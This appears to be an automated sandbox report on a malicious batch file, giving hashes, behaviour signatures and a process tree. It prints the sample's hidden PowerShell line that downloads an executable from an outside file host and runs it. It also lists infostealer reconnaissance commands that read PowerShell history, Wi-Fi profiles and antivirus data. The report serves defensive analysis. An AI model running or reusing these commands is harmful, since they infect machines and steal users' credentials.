Analysis

  • max time kernel
    929s
  • max time network
    828s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26/07/2024, 17:48

General

  • Target

    frdddd.bat

  • Size

    255B

  • MD5

    7cfc0e137d5d8b7f808add077083360b

  • SHA1

    af7b34d385fdfcb6c1e0b37ce3908dcc437f3da9

  • SHA256

    596217a3228f37bd8ac0ea92db6fc1b9fab378b96aea86ecd72e822809d948c5

  • SHA512

    9b02fec89d4dfe4982a824c6b2f3c345c670285718e04c81d0e39e463e9d8f366fff04d892aea6464ef6a644c791aa86429c67e1411bfba6935385f047098ae0

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copy of, a web browser credential store.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    PowerShell Invoke-WebRequest.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "$tempFile = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'services.exe'); Invoke-WebRequest -Uri 'https://pomf2.lain.la/f/fx2lvav.img' -OutFile $tempFile; Start-Process $tempFile -NoNewWindow -Wait"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1272
      • C:\Users\Admin\AppData\Local\Temp\services.exe
        "C:\Users\Admin\AppData\Local\Temp\services.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 1 1.1.1.1
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2336
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1268
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3540
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3364
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get name
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2984
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            5⤵
            • System Location Discovery: System Language Discovery
            • Detects videocard installed
            PID:3064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic cpu get name
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1736
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic cpu get name
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4640
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic os get Caption /value
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3096
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic os get Caption /value
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get currentrefreshrate
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5076
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get currentrefreshrate
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell Get-Content (Get-PSReadlineOption).HistorySavePath
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3520
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Content (Get-PSReadlineOption).HistorySavePath
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c tasklist
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:544
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            PID:1268
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c systeminfo
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:920
          • C:\Windows\SysWOW64\systeminfo.exe
            systeminfo
            5⤵
            • System Location Discovery: System Language Discovery
            • Gathers system information
            PID:3096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh wlan show profile
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:3400
          • C:\Windows\SysWOW64\netsh.exe
            netsh wlan show profile
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3828
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5112
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3244
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 1172
          4⤵
          • Program crash
          PID:3344
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:2136
  • C:\Windows\system32\BackgroundTransferHost.exe
    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
    1⤵
    PID:3776
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x494 0x454
    1⤵
    PID:3636
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\1IWDmrphZKxrlSMC\Exceptions.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:2196
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1388
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2964 -ip 2964
    1⤵
    PID:2984

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: c580727fc0a7a733ea6a446b67ca63f7
    SHA1: ebdd57fca25df0f759dec07c5382d560df7600c2
    SHA256: 369ef9ccfc9923d44f390840e46cc948796bb79bec86644402608e9a8af80073
    SHA512: 2a1aba5dfe194d53ce71cafb94d147999968aa0a7e5bd1db069da62ab3e06f475af77c258532647dcb7370f4e12c188b99624fc5a9c7c44f196c98e9d2b12733
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 3f9471c349b1f3de27e640979fa4c2cd
    SHA1: a387f843f5717aaab62c172839f365668a69d0b6
    SHA256: 0b1e1805b4a0043da17906a1c1a800fdb35ac3130d8d6b747a2c03d0ee458973
    SHA512: 87c2278b751ee1cff920cab744747c90348b276dfeb938fa426f33ae6c3fa70a4e3dbae3ed5169b153f9c6b4b844790f923fe332a8125bf9111bb2bf8d0458f4
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 20KB
    MD5: 43fb4c3431d333e211203b8b7b7091d5
    SHA1: 7cc7932de4bf095fc70dbe3fd68c41ad92ba22e0
    SHA256: fad93544286f033ebe4b786f7ff5f5bd35d0cfd10acc01f7a089d1747f396b45
    SHA512: 659f7f7b135508ebf8389ac15ec1f935d6aeb4320be4947c5fd8e593befc7444141e249e8d35029979cf989829dc6e3f59afcb90975cb46695c9f1dc69955edc
  • C:\Users\Admin\AppData\Local\Temp\1IWDmrphZKxrlSMC\Exceptions.txt
    Filesize: 8KB
    MD5: c1b2e5790cbc36c8d732bafad920c24c
    SHA1: cd235bb8abee255db783e7c6390a599022ae17fd
    SHA256: 06afdd368fdf472f0841302fe7853567dee32b4d8d638a57cb7c2a284438a391
    SHA512: 974c3929312f5f198a7e94ac3748925fbacd55259c38f179c849fbefb12682010e0faf3a588f3a031448628960211809169436ee714d04d835aaf9d312925a51
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2lvo2cby.poa.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Local\Temp\services.exe
    Filesize: 4.5MB
    MD5: b85914d36703377812cba113ca4638b7
    SHA1: 3c68a49b599dac13f4cb7cd327ad7c9c15313381
    SHA256: 2ef086862494efd63cfacf30753bb2df9dd55f18d04e71fb912e79d47657b9d3
    SHA512: 45ae20f08b16c8056cf4cd5a7e65f4f6b593cf41ca63431d0db153ddcfbbf28b1bff92800093cf48ca4b66c35afd3a626862559a247052b2ff5dc4c426a29a07
  • memory/1272-11-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp
    Filesize: 10.8MB
  • memory/1272-12-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp
    Filesize: 10.8MB
  • memory/1272-60-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp
    Filesize: 10.8MB
  • memory/1272-186-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp
    Filesize: 10.8MB
  • memory/1272-10-0x0000027FFBE00000-0x0000027FFBE22000-memory.dmp
    Filesize: 136KB
  • memory/1272-0-0x00007FFF11ED3000-0x00007FFF11ED5000-memory.dmp
    Filesize: 8KB
  • memory/1272-59-0x00007FFF11ED3000-0x00007FFF11ED5000-memory.dmp
    Filesize: 8KB
  • memory/1272-55-0x00007FFF11ED0000-0x00007FFF12991000-memory.dmp
    Filesize: 10.8MB
  • memory/1388-168-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/1388-173-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/1388-176-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/1388-177-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/1388-178-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/1388-174-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/1388-167-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/1388-172-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/1388-166-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/1388-175-0x0000020DBFB20000-0x0000020DBFB21000-memory.dmp
    Filesize: 4KB
  • memory/2964-164-0x0000000000400000-0x0000000000E59000-memory.dmp
    Filesize: 10.3MB
  • memory/2964-182-0x0000000000400000-0x0000000000E59000-memory.dmp
    Filesize: 10.3MB
  • memory/2964-21-0x0000000000400000-0x0000000000E59000-memory.dmp
    Filesize: 10.3MB
  • memory/2964-20-0x000000000082C000-0x00000000009CE000-memory.dmp
    Filesize: 1.6MB
  • memory/2964-18-0x0000000000400000-0x0000000000E59000-memory.dmp
    Filesize: 10.3MB
  • memory/3244-69-0x0000000006120000-0x0000000006474000-memory.dmp
    Filesize: 3.3MB
  • memory/3244-75-0x0000000006C10000-0x0000000006C5C000-memory.dmp
    Filesize: 304KB
  • memory/3688-25-0x0000000005020000-0x0000000005042000-memory.dmp
    Filesize: 136KB
  • memory/3688-46-0x00000000084A0000-0x0000000008A44000-memory.dmp
    Filesize: 5.6MB
  • memory/3688-45-0x00000000074E0000-0x0000000007502000-memory.dmp
    Filesize: 136KB
  • memory/3688-44-0x0000000007550000-0x00000000075E6000-memory.dmp
    Filesize: 600KB
  • memory/3688-43-0x0000000007140000-0x000000000715A000-memory.dmp
    Filesize: 104KB
  • memory/3688-42-0x0000000007870000-0x0000000007EEA000-memory.dmp
    Filesize: 6.5MB
  • memory/3688-41-0x0000000007170000-0x00000000071E6000-memory.dmp
    Filesize: 472KB
  • memory/3688-40-0x0000000007070000-0x00000000070B4000-memory.dmp
    Filesize: 272KB
  • memory/3688-39-0x00000000060A0000-0x00000000060EC000-memory.dmp
    Filesize: 304KB
  • memory/3688-38-0x0000000006050000-0x000000000606E000-memory.dmp
    Filesize: 120KB
  • memory/3688-37-0x00000000059C0000-0x0000000005D14000-memory.dmp
    Filesize: 3.3MB
  • memory/3688-27-0x00000000058F0000-0x0000000005956000-memory.dmp
    Filesize: 408KB
  • memory/3688-26-0x0000000005810000-0x0000000005876000-memory.dmp
    Filesize: 408KB
  • memory/3688-24-0x00000000050E0000-0x0000000005708000-memory.dmp
    Filesize: 6.2MB
  • memory/3688-23-0x00000000026E0000-0x0000000002716000-memory.dmp
    Filesize: 216KB